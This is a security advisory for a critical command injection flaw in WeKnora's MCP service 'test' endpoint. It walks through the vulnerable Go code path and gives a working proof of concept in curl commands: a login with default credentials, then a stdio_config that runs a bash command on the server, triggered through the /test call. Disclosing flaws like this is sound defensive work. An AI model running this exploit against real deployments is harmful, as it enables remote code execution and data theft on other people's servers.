GHSA-78h3-63c4-5fqc

Suggest an improvement
Source
https://github.com/advisories/GHSA-78h3-63c4-5fqc
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/01/GHSA-78h3-63c4-5fqc/GHSA-78h3-63c4-5fqc.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-78h3-63c4-5fqc
Aliases
Published
2026-01-09T19:21:22Z
Modified
2026-02-03T03:11:03.264220Z
Severity
  • 9.9 (Critical) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H CVSS Calculator
Summary
WeKnora has Command Injection in MCP stdio test
Details

Vulnerability Description

Vulnerability Overview

This issue is a command injection vulnerability (CWE-78) that allows authenticated users to inject stdio_config.command/args into MCP stdio settings, causing the server to execute subprocesses using these injected values.

The root causes are as follows:

  • Missing Security Filtering: When transporttype=stdio, there is no validation on stdioconfig.command/args, such as allowlisting, enforcing fixed paths/binaries, or blocking dangerous options.
  • Functional Flaw (Trust Boundary Violation): The command/args stored as "service configuration data" are directly used in the /test execution flow and connected to execution sinks without validation.
  • Lack of Authorization Control: This functionality effectively allows "process execution on the server" (an administrative operation), yet no administrator-only permission checks are implemented in the code (accessible with Bearer authentication only).

Vulnerable Code

  1. API Route Registration (path where endpoints are created) **https://github.com/Tencent/WeKnora/blob/6b7558c5592828380939af18240a4cef67a2cbfc/internal/router/router.go#L85-L110 https://github.com/Tencent/WeKnora/blob/6b7558c5592828380939af18240a4cef67a2cbfc/internal/router/router.go#L371-L390

     // 认证中间件
    r.Use(middleware.Auth(params.TenantService, params.UserService, params.Config))

    // 添加OpenTelemetry追踪中间件
    r.Use(middleware.TracingMiddleware())

    // 需要认证的API路由
    v1 := r.Group("/api/v1")
    {
        RegisterAuthRoutes(v1, params.AuthHandler)
        RegisterTenantRoutes(v1, params.TenantHandler)
        RegisterKnowledgeBaseRoutes(v1, params.KBHandler)
        RegisterKnowledgeTagRoutes(v1, params.TagHandler)
        RegisterKnowledgeRoutes(v1, params.KnowledgeHandler)
        RegisterFAQRoutes(v1, params.FAQHandler)
        RegisterChunkRoutes(v1, params.ChunkHandler)
        RegisterSessionRoutes(v1, params.SessionHandler)
        RegisterChatRoutes(v1, params.SessionHandler)
        RegisterMessageRoutes(v1, params.MessageHandler)
        RegisterModelRoutes(v1, params.ModelHandler)
        RegisterEvaluationRoutes(v1, params.EvaluationHandler)
        RegisterInitializationRoutes(v1, params.InitializationHandler)
        RegisterSystemRoutes(v1, params.SystemHandler)
        RegisterMCPServiceRoutes(v1, params.MCPServiceHandler)
        RegisterWebSearchRoutes(v1, params.WebSearchHandler)
    }

    func RegisterMCPServiceRoutes(r *gin.RouterGroup, handler *handler.MCPServiceHandler) {
    mcpServices := r.Group("/mcp-services")
    {
        // Create MCP service
        mcpServices.POST("", handler.CreateMCPService)
        // List MCP services
        mcpServices.GET("", handler.ListMCPServices)
        // Get MCP service by ID
        mcpServices.GET("/:id", handler.GetMCPService)
        // Update MCP service
        mcpServices.PUT("/:id", handler.UpdateMCPService)
        // Delete MCP service
        mcpServices.DELETE("/:id", handler.DeleteMCPService)
        // Test MCP service connection
        mcpServices.POST("/:id/test", handler.TestMCPService)
        // Get MCP service tools
        mcpServices.GET("/:id/tools", handler.GetMCPServiceTools)
        // Get MCP service resources
        mcpServices.GET("/:id/resources", handler.GetMCPServiceResources)
    }

  2. User input (JSON) → types.MCPService binding (POST /api/v1/mcp-services) **https://github.com/Tencent/WeKnora/blob/6b7558c5592828380939af18240a4cef67a2cbfc/internal/handler/mcp_service.go#L40-L55

        var service types.MCPService
    if err := c.ShouldBindJSON(&service); err != nil {
        logger.Error(ctx, "Failed to parse MCP service request", err)
        c.Error(errors.NewBadRequestError(err.Error()))
        return
    }

    tenantID := c.GetUint64(types.TenantIDContextKey.String())
    if tenantID == 0 {
        logger.Error(ctx, "Tenant ID is empty")
        c.Error(errors.NewBadRequestError("Tenant ID cannot be empty"))
        return
    }
    service.TenantID = tenantID

    if err := h.mcpServiceService.CreateMCPService(ctx, &service); err != nil {

  3. Taint propagation (storage): The bound service object is stored directly in the database without sanitization. **https://github.com/Tencent/WeKnora/blob/6b7558c5592828380939af18240a4cef67a2cbfc/internal/application/repository/mcp_service.go#L23-L25

    func (r *mcpServiceRepository) Create(ctx context.Context, service *types.MCPService) error {
    return r.db.WithContext(ctx).Create(service).Error
}

  4. Sink execution: /test endpoint loads the service from the database → executes TestMCPService

    https://github.com/Tencent/WeKnora/blob/6b7558c5592828380939af18240a4cef67a2cbfc/internal/handler/mcpservice.go#L323-L325 https://github.com/Tencent/WeKnora/blob/6b7558c5592828380939af18240a4cef67a2cbfc/internal/application/service/mcpservice.go#L238-L264

        logger.Infof(ctx, "Testing MCP service: %s", secutils.SanitizeForLog(serviceID))

    result, err := h.mcpServiceService.TestMCPService(ctx, tenantID, serviceID)

        service, err := s.mcpServiceRepo.GetByID(ctx, tenantID, id)
    if err != nil {
        return nil, fmt.Errorf("failed to get MCP service: %w", err)
    }
    if service == nil {
        return nil, fmt.Errorf("MCP service not found")
    }

    // Create temporary client for testing
    config := &mcp.ClientConfig{
        Service: service,
    }

    client, err := mcp.NewMCPClient(config)
    if err != nil {
        return &types.MCPTestResult{
            Success: false,
            Message: fmt.Sprintf("Failed to create client: %v", err),
        }, nil
    }

    // Connect
    testCtx, cancel := context.WithTimeout(ctx, 30*time.Second)
    defer cancel()

    if err := client.Connect(testCtx); err != nil {
        return &types.MCPTestResult{

  5. Ultimate sink (subprocess execution): The command/args values from stdio configuration are directly used in the subprocess execution path. **https://github.com/Tencent/WeKnora/blob/6b7558c5592828380939af18240a4cef67a2cbfc/internal/mcp/client.go#L120-L137 https://github.com/Tencent/WeKnora/blob/6b7558c5592828380939af18240a4cef67a2cbfc/internal/mcp/client.go#L158-L160

        case types.MCPTransportStdio:
        if config.Service.StdioConfig == nil {
            return nil, fmt.Errorf("stdio_config is required for stdio transport")
        }

        // Convert env vars map to []string format (KEY=value)
        envVars := make([]string, 0, len(config.Service.EnvVars))
        for key, value := range config.Service.EnvVars {
            envVars = append(envVars, fmt.Sprintf("%s=%s", key, value))
        }

        // Create stdio client with options
        // NewStdioMCPClientWithOptions(command string, env []string, args []string, opts ...transport.StdioOption)
        mcpClient, err = client.NewStdioMCPClientWithOptions(
            config.Service.StdioConfig.Command,
            envVars,
            config.Service.StdioConfig.Args,
        )

        if err := c.client.Start(ctx); err != nil {
        return fmt.Errorf("failed to start client: %w", err)
    }

PoC

PoC Description

  • Obtain an authentication token.
  • Create an MCP service with transporttype=stdio, injecting the command to execute into stdioconfig.command/args.
  • Call the /test endpoint to trigger the Connect() → Start() execution flow, confirming command execution on the server via side effects (e.g., file creation).

PoC

  • Container state verification (pre-exploitation)

    docker exec -it WeKnora-app /bin/bash
cd /tmp/; ls -l

    <img width="798" height="78" alt="image" src="https://github.com/user-attachments/assets/3e387e39-cd80-4e30-ba23-3db9ff879209" />

  • Authenticate via /api/v1/auth/login to obtain a Bearer token for API calls.

    API="http://localhost:8080"
EMAIL="admin@gmail.com"
PASS="admin123"

TOKEN="$(curl -sS -X POST "$API/api/v1/auth/login" \
  -H "Content-Type: application/json" \
  -d "{\"email\":\"$EMAIL\",\"password\":\"$PASS\"}" | jq -r '.token // empty')"

echo "TOKEN=$TOKEN"

    <img width="760" height="73" alt="image" src="https://github.com/user-attachments/assets/4e588f20-9371-4dc3-b585-def2cd752497" />

    <img width="1679" height="193" alt="image" src="https://github.com/user-attachments/assets/a372981c-dc4c-40e9-a9af-4d27fd36251a" />

  • POST to /api/v1/mcp-services with transporttype=stdio and stdioconfig to define the command and arguments to be executed on the server.

    CREATE_RES="$(curl -sS -X POST "$API/api/v1/mcp-services" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "name":"rce",
    "description":"rce",
    "enabled":true,
    "transport_type":"stdio",
    "stdio_config":{"command":"bash","args":["-lc","id > /tmp/RCE_ok.txt && uname -a >> /tmp/RCE_ok.txt"]},
    "env_vars":{}
  }')"

MCP_ID="$(echo "$CREATE_RES" | jq -r '.data.id // empty')"
echo "MCP_ID=$MCP_ID"

    <img width="1296" height="354" alt="image" src="https://github.com/user-attachments/assets/d109dd4e-d051-46e3-bdcc-4d1a181d1635" />

  • Invoke /api/v1/mcp-services/{id}/test to trigger Connect(), causing execution of the stdio subprocess.

    curl -sS -X POST "$API/api/v1/mcp-services/$MCP_ID/test" \
  -H "Authorization: Bearer $TOKEN" | jq .

    <img width="1270" height="217" alt="image" src="https://github.com/user-attachments/assets/2723ef39-f6b8-4478-b60e-5b6a4e667a1e" />

  • Post-exploitation verification (container state)

    ls -l

    <img width="1243" height="221" alt="image" src="https://github.com/user-attachments/assets/5f78f83a-64e2-4a0a-95c4-6832f606fbcd" />

Impact

  • Remote Code Execution (RCE): Arbitrary command execution enables file creation/modification, execution of additional payloads, and service disruption
  • Information Disclosure: Sensitive data exfiltration through reading environment variables, configuration files, keys, tokens, and local files
  • Privilege Escalation/Lateral Movement (Environment-Dependent): Impact may escalate based on container mounts, network policies, and internal service access permissions
  • Cross-Tenant Boundary Impact: Execution occurs in a shared backend runtime; depending on deployment configuration, impact may extend beyond tenant boundaries (exact scope is uncertain and varies by deployment setup)
Database specific 
{
    "nvd_published_at": "2026-01-10T04:16:01Z",
    "cwe_ids": [
        "CWE-77"
    ],
    "github_reviewed_at": "2026-01-09T19:21:22Z",
    "severity": "CRITICAL",
    "github_reviewed": true
}
References

Affected packages

Go / github.com/Tencent/WeKnora

Package

Name
github.com/Tencent/WeKnora
View open source insights on deps.dev
Purl
pkg:golang/github.com/Tencent/WeKnora

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
0.2.5

Database specific

source 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/01/GHSA-78h3-63c4-5fqc/GHSA-78h3-63c4-5fqc.json"